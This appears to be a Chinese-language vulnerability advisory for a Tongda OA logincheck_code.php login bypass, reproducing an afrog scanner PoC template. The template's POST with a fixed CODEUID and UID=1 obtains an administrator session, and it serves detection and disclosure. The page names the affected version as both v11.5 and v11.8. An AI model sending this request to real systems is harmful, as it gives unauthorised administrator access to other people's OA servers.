tongda-v11-session-disclosure-login-bypass: 通达OA v11.5 logincheck_code.php 登陆绕过漏洞

日期: 2025-09-01 | 影响软件: 通达OA v11.5 | POC: 已公开

漏洞描述

通达OA v11.8 logincheck_code.php存在登陆绕过漏洞,通过漏洞攻击者可以登陆系统管理员后台 app="TDXK-通达OA"

PoC代码[已公开]

id: tongda-v11-session-disclosure-login-bypass

info:
  name: 通达OA v11.5 logincheck_code.php 登陆绕过漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    通达OA v11.8 logincheck_code.php存在登陆绕过漏洞,通过漏洞攻击者可以登陆系统管理员后台
    app="TDXK-通达OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.5%20logincheck_code.php%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /general/login_code.php
    expression: response.status == 200 && response.headers["content-type"].contains("image/png")
  r1:
    request:
      method: POST
      path: /logincheck_code.php
      body: |
        CODEUID=%7BD384F12E-A758-F44F-8A37-20E2568306A7%7D&UID=1
    expression: response.status == 200 && response.body.bcontains(b'"status":')  && response.body.bcontains(b'"msg":') && response.body.bcontains(b'"url":') && response.body.bcontains(b'index.php?isIE=0')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/tongda-v11-session-disclosure-login-bypass.yaml